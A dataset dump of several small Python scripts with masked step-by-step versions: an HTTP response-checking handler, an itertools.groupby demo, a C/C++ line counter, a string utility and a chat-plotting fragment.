[{}] in origin_rsp and expected_rsp'\n .format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning(\n \"\"\"Length of list is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n assert len(origin_rsp) == len(expected_rsp\n ), 'Length of list is not right! Please check the length.'\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)\n ) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,\n unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n \"\"\"Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in expected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! We get different value here!!'\n\n def _order_json(self, json_string):\n \"\"\"\n Return an ordered list for compare.\n :param json_string: string in json format\n :return: an ordered list\n \"\"\"\n if isinstance(json_string, dict):\n return sorted((k, self._order_json(v)) for k, v in json_string.\n items())\n if isinstance(json_string, list):\n return sorted(self._order_json(x) for x in json_string)\n else:\n return json_string\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-4": "import requests\nimport logging\nimport json\n\n\nclass Handler(object):\n\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n\n def check_rsp(self, origin_rsp, expected_rsp, check_format=False,\n check_partial_rsp=False, check_length=False,\n check_format_ignore_list_length=False, check_format_null_str=False):\n if check_format:\n logging.warning(\n 'Now start to check format for origin_rsp and expected_rsp!')\n self._check_format(origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str)\n if check_partial_rsp:\n self._check_partial_rsp(expected_rsp, origin_rsp)\n if check_length is not False:\n for key, expected_length in check_length.iteritems():\n current_length = len(origin_rsp[key])\n assert expected_length == current_length, \"We expect to see length of '{}' in origin_rsp is {}, but now it is {}\".format(\n key, expected_length, current_length)\n if not any([check_format, check_partial_rsp, check_length]):\n sorted_expected_rsp = self._order_json(expected_rsp)\n sorted_origin_rsp = self._order_json(origin_rsp)\n logging.warning('\\nWe expect to see \\n\\n{}, \\n\\nand we get \\n\\n{}.'\n .format(sorted_expected_rsp, sorted_origin_rsp))\n assert sorted_expected_rsp == sorted_origin_rsp, \"We don't get the expected,please check the log\"\n logging.warning('\\x1b[0;32m check_rsp done!!! PASS\\x1b[0m')\n\n def _check_format(self, origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str):\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(expected_rsp\n ), \"\"\"Length of dict is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\".format(\n origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(key\n ), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(\n str(key))\n logging.warning(\n u'Check value for the same key: [{}] in origin_rsp and expected_rsp'\n .format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning(\n \"\"\"Length of list is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n assert len(origin_rsp) == len(expected_rsp\n ), 'Length of list is not right! Please check the length.'\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)\n ) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,\n unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n \"\"\"Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in expected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! We get different value here!!'\n\n def _order_json(self, json_string):\n \"\"\"\n Return an ordered list for compare.\n :param json_string: string in json format\n :return: an ordered list\n \"\"\"\n if isinstance(json_string, dict):\n return sorted((k, self._order_json(v)) for k, v in json_string.\n items())\n if isinstance(json_string, list):\n return sorted(self._order_json(x) for x in json_string)\n else:\n return json_string\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-5": "import requests\nimport logging\nimport json\n\n\nclass Handler(object):\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n\n # get an active token and get prepared for sending request\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning('when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n\n logging.warning('\\n\\n#####\\nget rsp from url: \\n{} is :\\n##### \\n{}\\n#####\\n\\ntext is: \\n{}\\n#####\\n'.\n format(url, repr(rsp), repr(rsp.text)))\n return rsp\n\n def check_rsp(self, origin_rsp, expected_rsp, check_format=False, check_partial_rsp=False, check_length=False,\n check_format_ignore_list_length=False, check_format_null_str=False):\n\n if check_format:\n logging.warning('Now start to check format for origin_rsp and expected_rsp!')\n\n self._check_format(origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str)\n if check_partial_rsp:\n self._check_partial_rsp(expected_rsp, origin_rsp)\n if check_length is not False:\n for key, expected_length in check_length.iteritems():\n current_length = len(origin_rsp[key])\n assert expected_length == current_length, \\\n 'We expect to see length of \\'{}\\' in origin_rsp is {}, but now it is {}'.format(\n key, expected_length, current_length)\n if not any([check_format, check_partial_rsp, check_length]):\n sorted_expected_rsp = self._order_json(expected_rsp)\n sorted_origin_rsp = self._order_json(origin_rsp)\n logging.warning('\\nWe expect to see \\n\\n{}, \\n\\nand we get \\n\\n{}.'.format(sorted_expected_rsp,\n sorted_origin_rsp))\n assert sorted_expected_rsp == sorted_origin_rsp, \\\n 'We don\\'t get the expected,please check the log'\n\n logging.warning('\\033[0;32m check_rsp done!!! PASS\\033[0m')\n\n def _check_format(self, origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str):\n\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(\n expected_rsp), 'Length of dict is not right! Please check the length.\\norigin_rsp: ' \\\n '\\n{}\\nexpected_rsp: \\n{}'.format(origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(\n key), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(str(key))\n logging.warning(u'Check value for the same key: [{}] in origin_rsp and expected_rsp'.format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning('Length of list is not right! Please check the length.\\norigin_rsp: \\n{}\\nexpected_rsp:'\n ' \\n{}'.format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[index],\n check_format_ignore_list_length, check_format_null_str)\n else:\n assert len(origin_rsp) == len(\n expected_rsp), 'Length of list is not right! Please check the length.'\n\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[index],\n check_format_ignore_list_length, check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)) and (\n isinstance(expected_rsp, str) or isinstance(expected_rsp, unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n 'Check format fail!!!! We get different value here!!\\norigin_rsp: \\n{}\\nbut we expect to see in '\n 'expected_rsp: \\n{}'.format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! We get different value here!!'\n\n def _order_json(self, json_string):\n \"\"\"\n Return an ordered list for compare.\n :param json_string: string in json format\n :return: an ordered list\n \"\"\"\n\n if isinstance(json_string, dict):\n return sorted((k, self._order_json(v)) for k, v in json_string.items())\n if isinstance(json_string, list):\n return sorted(self._order_json(x) for x in json_string)\n else:\n return json_string\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning('Start to check if expected_rsp: {} is part of origin_rsp: {}'.format(exp, ori))\n # so far, leaf node could be string or list which must be exactly the same\n\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, 'key \\'{}\\' does not exist in original response.'.format(k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index] in ori, 'exp: {} does not in ori: {}'.format(exp[index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp, ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(subset_dict, whole_dict)\n",
"step-ids": [
4,
6,
8,
9,
10
]
}
|
[
4,
6,
8,
9,
10
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# groupby()
# groupby()把迭代器中相邻的重复元素挑出来放在一起:
import itertools
for key, group in itertools.groupby('ABAABBBCCAAA'):
print(key, list(group))
# 小结
# itertools模块提供的全部是处理迭代功能的函数,它们的返回值不是list,而是Iterator,只有用for循环迭代的时候才真正计算。
|
normal
|
{
"blob_id": "b5568e84e19719f0fd72197ead47bd050e09f55d",
"index": 7310,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor key, group in itertools.groupby('ABAABBBCCAAA'):\n print(key, list(group))\n",
"step-3": "import itertools\nfor key, group in itertools.groupby('ABAABBBCCAAA'):\n print(key, list(group))\n",
"step-4": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# groupby()\n# groupby()把迭代器中相邻的重复元素挑出来放在一起:\nimport itertools\nfor key, group in itertools.groupby('ABAABBBCCAAA'):\n print(key, list(group))\n\n\n# 小结\n# itertools模块提供的全部是处理迭代功能的函数,它们的返回值不是list,而是Iterator,只有用for循环迭代的时候才真正计算。\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1
) or file.endswith(extension2) or file.endswith(extension3):
if _platform == 'linux' or _platform == 'linux2':
ss = '/'
elif _platform == 'win32' or _platform == 'win64':
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f'{filePathAndName}')
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while True:
li = fi.readline()
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos:
break
else:
pos = newpos
lines += fileLines
filewrite.write(f'{fileLines}\n')
print(file + ' ' + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f'{files}\n')
filewrite.write(f'{lines}\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
files = 0
lines = 0
extension0 = '.c'
extension1 = '.cpp'
extension2 = '.h'
extension3 = '.hpp'
filename = inspect.getframeinfo(inspect.currentframe()).filename
startPath = os.path.dirname(os.path.abspath(filename))
with open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1
) or file.endswith(extension2) or file.endswith(extension3):
if _platform == 'linux' or _platform == 'linux2':
ss = '/'
elif _platform == 'win32' or _platform == 'win64':
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f'{filePathAndName}')
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while True:
li = fi.readline()
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos:
break
else:
pos = newpos
lines += fileLines
filewrite.write(f'{fileLines}\n')
print(file + ' ' + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f'{files}\n')
filewrite.write(f'{lines}\n')
<|reserved_special_token_1|>
import os
from sys import platform as _platform
import fnmatch
import inspect
files = 0
lines = 0
extension0 = '.c'
extension1 = '.cpp'
extension2 = '.h'
extension3 = '.hpp'
filename = inspect.getframeinfo(inspect.currentframe()).filename
startPath = os.path.dirname(os.path.abspath(filename))
with open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1
) or file.endswith(extension2) or file.endswith(extension3):
if _platform == 'linux' or _platform == 'linux2':
ss = '/'
elif _platform == 'win32' or _platform == 'win64':
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f'{filePathAndName}')
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while True:
li = fi.readline()
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos:
break
else:
pos = newpos
lines += fileLines
filewrite.write(f'{fileLines}\n')
print(file + ' ' + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f'{files}\n')
filewrite.write(f'{lines}\n')
<|reserved_special_token_1|>
#os for file system
import os
from sys import platform as _platform
import fnmatch
import inspect
files = 0
lines = 0
extension0 = '.c'
extension1 = '.cpp'
extension2 = '.h'
extension3 = '.hpp'
filename = inspect.getframeinfo(inspect.currentframe()).filename
startPath = os.path.dirname(os.path.abspath(filename))
with open("files_with_extensions.txt", "w", encoding="utf-8") as filewrite:
for r, d, f in os.walk(startPath):
for file in f:
if file.endswith(extension0) or file.endswith(extension1) or file.endswith(extension2) or file.endswith(extension3):
if _platform == "linux" or _platform == "linux2":
ss = '/'
elif _platform == "win32" or _platform == "win64":
ss = '\\'
filePathAndName = r + ss + file
files += 1
filewrite.write(f"{filePathAndName}")
fi = open(filePathAndName, 'r')
pos = fi.tell()
fileLines = 0
while (True):
li = fi.readline()
# check for any hidden symbols
if li.isspace():
continue
newpos = fi.tell()
fileLines += 1
if newpos == pos: # stream position hasn't changed -> EOF
break
else:
pos = newpos
lines += fileLines
filewrite.write(f"{fileLines}\n")
print(file + " " + str(fileLines))
fi.close()
print(files)
print(lines)
filewrite.write(f"{files}\n")
filewrite.write(f"{lines}\n")
|
flexible
|
{
"blob_id": "d287123acdbabdd5a223e774c89945ab888fcbcc",
"index": 5439,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1\n ) or file.endswith(extension2) or file.endswith(extension3):\n if _platform == 'linux' or _platform == 'linux2':\n ss = '/'\n elif _platform == 'win32' or _platform == 'win64':\n ss = '\\\\'\n filePathAndName = r + ss + file\n files += 1\n filewrite.write(f'{filePathAndName}')\n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n fileLines = 0\n while True:\n li = fi.readline()\n if li.isspace():\n continue\n newpos = fi.tell()\n fileLines += 1\n if newpos == pos:\n break\n else:\n pos = newpos\n lines += fileLines\n filewrite.write(f'{fileLines}\\n')\n print(file + ' ' + str(fileLines))\n fi.close()\n print(files)\n print(lines)\n filewrite.write(f'{files}\\n')\n filewrite.write(f'{lines}\\n')\n",
"step-3": "<mask token>\nfiles = 0\nlines = 0\nextension0 = '.c'\nextension1 = '.cpp'\nextension2 = '.h'\nextension3 = '.hpp'\nfilename = inspect.getframeinfo(inspect.currentframe()).filename\nstartPath = os.path.dirname(os.path.abspath(filename))\nwith open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1\n ) or file.endswith(extension2) or file.endswith(extension3):\n if _platform == 'linux' or _platform == 'linux2':\n ss = '/'\n elif _platform == 'win32' or _platform == 'win64':\n ss = '\\\\'\n filePathAndName = r + ss + file\n files += 1\n filewrite.write(f'{filePathAndName}')\n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n fileLines = 0\n while True:\n li = fi.readline()\n if li.isspace():\n continue\n newpos = fi.tell()\n fileLines += 1\n if newpos == pos:\n break\n else:\n pos = newpos\n lines += fileLines\n filewrite.write(f'{fileLines}\\n')\n print(file + ' ' + str(fileLines))\n fi.close()\n print(files)\n print(lines)\n filewrite.write(f'{files}\\n')\n filewrite.write(f'{lines}\\n')\n",
"step-4": "import os\nfrom sys import platform as _platform\nimport fnmatch\nimport inspect\nfiles = 0\nlines = 0\nextension0 = '.c'\nextension1 = '.cpp'\nextension2 = '.h'\nextension3 = '.hpp'\nfilename = inspect.getframeinfo(inspect.currentframe()).filename\nstartPath = os.path.dirname(os.path.abspath(filename))\nwith open('files_with_extensions.txt', 'w', encoding='utf-8') as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1\n ) or file.endswith(extension2) or file.endswith(extension3):\n if _platform == 'linux' or _platform == 'linux2':\n ss = '/'\n elif _platform == 'win32' or _platform == 'win64':\n ss = '\\\\'\n filePathAndName = r + ss + file\n files += 1\n filewrite.write(f'{filePathAndName}')\n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n fileLines = 0\n while True:\n li = fi.readline()\n if li.isspace():\n continue\n newpos = fi.tell()\n fileLines += 1\n if newpos == pos:\n break\n else:\n pos = newpos\n lines += fileLines\n filewrite.write(f'{fileLines}\\n')\n print(file + ' ' + str(fileLines))\n fi.close()\n print(files)\n print(lines)\n filewrite.write(f'{files}\\n')\n filewrite.write(f'{lines}\\n')\n",
"step-5": "#os for file system\nimport os\n\nfrom sys import platform as _platform\n\nimport fnmatch\nimport inspect\n\nfiles = 0\nlines = 0 \n \nextension0 = '.c'\nextension1 = '.cpp'\nextension2 = '.h'\t\nextension3 = '.hpp'\t\n\nfilename = inspect.getframeinfo(inspect.currentframe()).filename\nstartPath = os.path.dirname(os.path.abspath(filename))\n\nwith open(\"files_with_extensions.txt\", \"w\", encoding=\"utf-8\") as filewrite:\n for r, d, f in os.walk(startPath):\n for file in f:\n if file.endswith(extension0) or file.endswith(extension1) or file.endswith(extension2) or file.endswith(extension3):\n\n if _platform == \"linux\" or _platform == \"linux2\":\n ss = '/'\n elif _platform == \"win32\" or _platform == \"win64\":\n ss = '\\\\'\n\n filePathAndName = r + ss + file\n\n files += 1\n\n filewrite.write(f\"{filePathAndName}\")\n \n fi = open(filePathAndName, 'r')\n pos = fi.tell()\n\n fileLines = 0\n while (True):\n li = fi.readline()\n\n # check for any hidden symbols\n if li.isspace():\n continue\n \n newpos = fi.tell()\n fileLines += 1\n if newpos == pos: # stream position hasn't changed -> EOF\n break\n else:\n pos = newpos\n\n lines += fileLines\n\n filewrite.write(f\"{fileLines}\\n\")\n print(file + \" \" + str(fileLines))\n\n fi.close()\n \n\n print(files)\n print(lines)\n\n filewrite.write(f\"{files}\\n\")\n filewrite.write(f\"{lines}\\n\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def long_alpha(str1):
list1 = []
list2 = ""
maxi = 0
j = 0
for i in range(len(str1)):
if i == 0:
list2 += str1[i]
elif ord(str1[i - 1]) <= ord(str1[i]):
list2 += str1[i]
else:
list1.append(list2)
list2 = ""
list2 += str1[i]
list1.append(list2)
for i in range(len(list1)):
if maxi < len(list1[i]):
maxi = len(list1[i])
j = i
return list1[j]
str1 = "abcaklmoeeffd"
res = long_alpha(str1)
print(res)
|
normal
|
{
"blob_id": "e7c18fa99c801fd959c868954f020d8c55babe0d",
"index": 7543,
"step-1": "<mask token>\n",
"step-2": "def long_alpha(str1):\n list1 = []\n list2 = ''\n maxi = 0\n j = 0\n for i in range(len(str1)):\n if i == 0:\n list2 += str1[i]\n elif ord(str1[i - 1]) <= ord(str1[i]):\n list2 += str1[i]\n else:\n list1.append(list2)\n list2 = ''\n list2 += str1[i]\n list1.append(list2)\n for i in range(len(list1)):\n if maxi < len(list1[i]):\n maxi = len(list1[i])\n j = i\n return list1[j]\n\n\n<mask token>\n",
"step-3": "def long_alpha(str1):\n list1 = []\n list2 = ''\n maxi = 0\n j = 0\n for i in range(len(str1)):\n if i == 0:\n list2 += str1[i]\n elif ord(str1[i - 1]) <= ord(str1[i]):\n list2 += str1[i]\n else:\n list1.append(list2)\n list2 = ''\n list2 += str1[i]\n list1.append(list2)\n for i in range(len(list1)):\n if maxi < len(list1[i]):\n maxi = len(list1[i])\n j = i\n return list1[j]\n\n\n<mask token>\nprint(res)\n",
"step-4": "def long_alpha(str1):\n list1 = []\n list2 = ''\n maxi = 0\n j = 0\n for i in range(len(str1)):\n if i == 0:\n list2 += str1[i]\n elif ord(str1[i - 1]) <= ord(str1[i]):\n list2 += str1[i]\n else:\n list1.append(list2)\n list2 = ''\n list2 += str1[i]\n list1.append(list2)\n for i in range(len(list1)):\n if maxi < len(list1[i]):\n maxi = len(list1[i])\n j = i\n return list1[j]\n\n\nstr1 = 'abcaklmoeeffd'\nres = long_alpha(str1)\nprint(res)\n",
"step-5": "\r\ndef long_alpha(str1):\r\n list1 = []\r\n list2 = \"\"\r\n maxi = 0\r\n j = 0\r\n for i in range(len(str1)):\r\n if i == 0:\r\n list2 += str1[i]\r\n elif ord(str1[i - 1]) <= ord(str1[i]):\r\n list2 += str1[i]\r\n else:\r\n list1.append(list2)\r\n list2 = \"\"\r\n list2 += str1[i]\r\n list1.append(list2)\r\n\r\n for i in range(len(list1)):\r\n if maxi < len(list1[i]):\r\n maxi = len(list1[i])\r\n j = i\r\n return list1[j]\r\nstr1 = \"abcaklmoeeffd\"\r\nres = long_alpha(str1)\r\nprint(res)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(a)
<|reserved_special_token_0|>
print(b)
<|reserved_special_token_0|>
print(c)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_1|>
a = len('Karen')
print(a)
b = 'Rainha Elizabeth'.count('a')
print(b)
c = 'karen nayara'.replace('a', '@')
print(c)
d = 'karen meeseeks gomes'.split()
print(d)
<|reserved_special_token_1|>
# len(): tamanho da string
# count(): conta quantas vezes um caractere aparece
# lower(), upper()
# replace(): substitui as letras por outra
# split(): quebra uma string a partir dos espacos em branco
a = len('Karen')
print(a)
b = 'Rainha Elizabeth'.count('a')
print(b)
c = 'karen nayara'.replace('a','@')
print(c)
d = 'karen meeseeks gomes'.split()
print(d)
|
flexible
|
{
"blob_id": "3079fdbe6319454ad166d06bda5670554a5746ee",
"index": 1004,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a)\n<mask token>\nprint(b)\n<mask token>\nprint(c)\n<mask token>\nprint(d)\n",
"step-3": "a = len('Karen')\nprint(a)\nb = 'Rainha Elizabeth'.count('a')\nprint(b)\nc = 'karen nayara'.replace('a', '@')\nprint(c)\nd = 'karen meeseeks gomes'.split()\nprint(d)\n",
"step-4": "# len(): tamanho da string\n# count(): conta quantas vezes um caractere aparece\n# lower(), upper()\n# replace(): substitui as letras por outra\n# split(): quebra uma string a partir dos espacos em branco\n\na = len('Karen')\nprint(a)\nb = 'Rainha Elizabeth'.count('a')\nprint(b)\nc = 'karen nayara'.replace('a','@')\nprint(c)\nd = 'karen meeseeks gomes'.split()\nprint(d)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import math
import datetime
import numpy as np
import matplotlib.pyplot as plt
def draw_chat(
id, smooth_id, main_mode,
my_name, chat_day_data,
main_plot, pie_plot, list_chats_plot):
min_in_day = 1440
possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
possible_smooth = [10, 15, 20, 30, 40, 45, 60] #divisors of 1440 (minutes in day)
count_of_chats = len(chat_day_data)
id = (id + count_of_chats) % count_of_chats
smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)
